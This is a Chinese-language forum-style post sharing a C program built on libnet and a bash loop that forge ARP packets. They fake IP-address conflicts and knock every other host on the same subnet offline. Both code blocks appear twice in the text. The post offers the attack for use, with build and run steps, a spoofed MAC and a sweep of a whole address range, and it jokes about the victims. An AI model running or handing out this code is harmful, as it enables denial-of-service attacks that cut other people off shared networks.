最近看ARP
用ARP欺騙搞了個掉線程序
就是造成同一網段內的其他上網主機IP地址衝突 從而達到使其掉線的目的......
下面放源碼 和 運行SHELL腳本
環境LINUX 需要libnet libpcap庫支持
編譯生成drop_line,和 drop.sh放到同一目錄下
運行:
#sh drop.sh
一次不行的話 多運行幾次
嘿嘿
/* drop_line.c
* 編譯: #gcc -o drop_line drop_line.c -Wall -lnet -lpcap
* 運行: #./drop_line <dest IP addr>
*
* 注意事項:使用前一定要在寢室裏獨自一人,緊閉門窗,身邊最好能配棍一把,以防受害者上門滋事 :P
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <libnet.h>
#include <pcap.h>
#ifndef ETH_ALEN
#define ETH_ALEN 6
#endif
#ifndef IP_ALEN
#define IP_ALEN 4
#endif
/********************************
static u_char eth_xmas[ETH_ALEN] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
static u_char eth_null[ETH_ALEN] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
*********************************/
static u_char eth_src[ETH_ALEN] = { 0x0, 0x18, 0xf3, 0x0, 0x53, 0x66 }; /* 僞裝了host mac 呵呵 */
static u_char eth_dst[ETH_ALEN] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }; /* broadcast */
static u_char ip_src[IP_ALEN];
static u_char ip_dst[IP_ALEN];
int main(int argc, char **argv)
{
libnet_t *libnet = NULL;
char error[LIBNET_ERRBUF_SIZE];
int c;
if (getuid() && geteuid()) {
fprintf(stderr, "must be run as root");
exit(1);
}
if (argc != 2) {
printf("usage: %s <dst IP addr> ", argv[0]);
}
// open libnet
libnet = libnet_init(LIBNET_LINK, "eth0", error);
if (libnet == NULL) {
fprintf(stderr, "libnet_init() failed: %s", error);
exit(EXIT_FAILURE);
}
// get dst ip address
u_int32_t src_ip;
src_ip = libnet_name2addr4(libnet, argv[1], LIBNET_RESOLVE);
memcpy(ip_src, (char *) &src_ip, IP_ALEN);
{ /* 網關IP */
ip_dst[0] = 218; ip_dst[1] = 29; ip_dst[2] = 153; ip_dst[3] = 254;
} //218.29.153.254
/* // print IP & MAC address
printf("dst IP: %d.%d.%d.%d ", ip_dst[0], ip_dst[1], ip_dst[2],
ip_dst[3]);
printf("drop IP: %d.%d.%d.%d ", ip_src[0], ip_src[1], ip_src[2],
ip_src[3]);
printf(" ");
for (i = 0; i < ETH_ALEN - 1; i++) {
printf("%.2x:", (u_int8_t) eth_src[i]);
}
printf("%.2x", (u_int8_t) eth_src[ETH_ALEN - 1]);
printf(" ");
*/
static libnet_ptag_t arp = 0, eth = 0;
arp = libnet_build_arp(ARPHRD_ETHER,
ETHERTYPE_IP,
ETH_ALEN, IP_ALEN,
ARPOP_REQUEST,
eth_src, ip_src,
eth_dst, ip_dst, NULL, 0, libnet, 0);
if (arp == -1) {
fprintf(stderr, "Can't build ARP header: %s ",
libnet_geterror(libnet));
goto bad;
}
eth = libnet_build_ethernet(eth_dst, eth_src, ETHERTYPE_ARP, NULL, 0, libnet, eth); /* 構造物理幀頭 */
if (eth == -1) {
fprintf(stderr, "Can't build ethernet header: %s ",
libnet_geterror(libnet));
goto bad;
}
c = libnet_write(libnet);
if (c == -1) {
fprintf(stderr, "Can't send ARP packet: %s ",
libnet_geterror(libnet));
goto bad;
}
libnet_destroy(libnet);
return 0;
bad:
libnet_destroy(libnet);
return -1;
}
* 編譯: #gcc -o drop_line drop_line.c -Wall -lnet -lpcap
* 運行: #./drop_line <dest IP addr>
*
* 注意事項:使用前一定要在寢室裏獨自一人,緊閉門窗,身邊最好能配棍一把,以防受害者上門滋事 :P
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <libnet.h>
#include <pcap.h>
#ifndef ETH_ALEN
#define ETH_ALEN 6
#endif
#ifndef IP_ALEN
#define IP_ALEN 4
#endif
/********************************
static u_char eth_xmas[ETH_ALEN] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
static u_char eth_null[ETH_ALEN] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
*********************************/
static u_char eth_src[ETH_ALEN] = { 0x0, 0x18, 0xf3, 0x0, 0x53, 0x66 }; /* 僞裝了host mac 呵呵 */
static u_char eth_dst[ETH_ALEN] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }; /* broadcast */
static u_char ip_src[IP_ALEN];
static u_char ip_dst[IP_ALEN];
int main(int argc, char **argv)
{
libnet_t *libnet = NULL;
char error[LIBNET_ERRBUF_SIZE];
int c;
if (getuid() && geteuid()) {
fprintf(stderr, "must be run as root");
exit(1);
}
if (argc != 2) {
printf("usage: %s <dst IP addr> ", argv[0]);
}
// open libnet
libnet = libnet_init(LIBNET_LINK, "eth0", error);
if (libnet == NULL) {
fprintf(stderr, "libnet_init() failed: %s", error);
exit(EXIT_FAILURE);
}
// get dst ip address
u_int32_t src_ip;
src_ip = libnet_name2addr4(libnet, argv[1], LIBNET_RESOLVE);
memcpy(ip_src, (char *) &src_ip, IP_ALEN);
{ /* 網關IP */
ip_dst[0] = 218; ip_dst[1] = 29; ip_dst[2] = 153; ip_dst[3] = 254;
} //218.29.153.254
/* // print IP & MAC address
printf("dst IP: %d.%d.%d.%d ", ip_dst[0], ip_dst[1], ip_dst[2],
ip_dst[3]);
printf("drop IP: %d.%d.%d.%d ", ip_src[0], ip_src[1], ip_src[2],
ip_src[3]);
printf(" ");
for (i = 0; i < ETH_ALEN - 1; i++) {
printf("%.2x:", (u_int8_t) eth_src[i]);
}
printf("%.2x", (u_int8_t) eth_src[ETH_ALEN - 1]);
printf(" ");
*/
static libnet_ptag_t arp = 0, eth = 0;
arp = libnet_build_arp(ARPHRD_ETHER,
ETHERTYPE_IP,
ETH_ALEN, IP_ALEN,
ARPOP_REQUEST,
eth_src, ip_src,
eth_dst, ip_dst, NULL, 0, libnet, 0);
if (arp == -1) {
fprintf(stderr, "Can't build ARP header: %s ",
libnet_geterror(libnet));
goto bad;
}
eth = libnet_build_ethernet(eth_dst, eth_src, ETHERTYPE_ARP, NULL, 0, libnet, eth); /* 構造物理幀頭 */
if (eth == -1) {
fprintf(stderr, "Can't build ethernet header: %s ",
libnet_geterror(libnet));
goto bad;
}
c = libnet_write(libnet);
if (c == -1) {
fprintf(stderr, "Can't send ARP packet: %s ",
libnet_geterror(libnet));
goto bad;
}
libnet_destroy(libnet);
return 0;
bad:
libnet_destroy(libnet);
return -1;
}
SHELL SCRIPT:
#!/bin/bash
target=254
current=1
while [ $current -le $target ]
do
./drop_line 218.29.153.$current #填成你的實際ip段
current=`expr $current + 1`
done
echo
exit 0
target=254
current=1
while [ $current -le $target ]
do
./drop_line 218.29.153.$current #填成你的實際ip段
current=`expr $current + 1`
done
echo
exit 0
發送的ARP包無法通過貓
只能在同一局域網內實現功能
回來再研究研究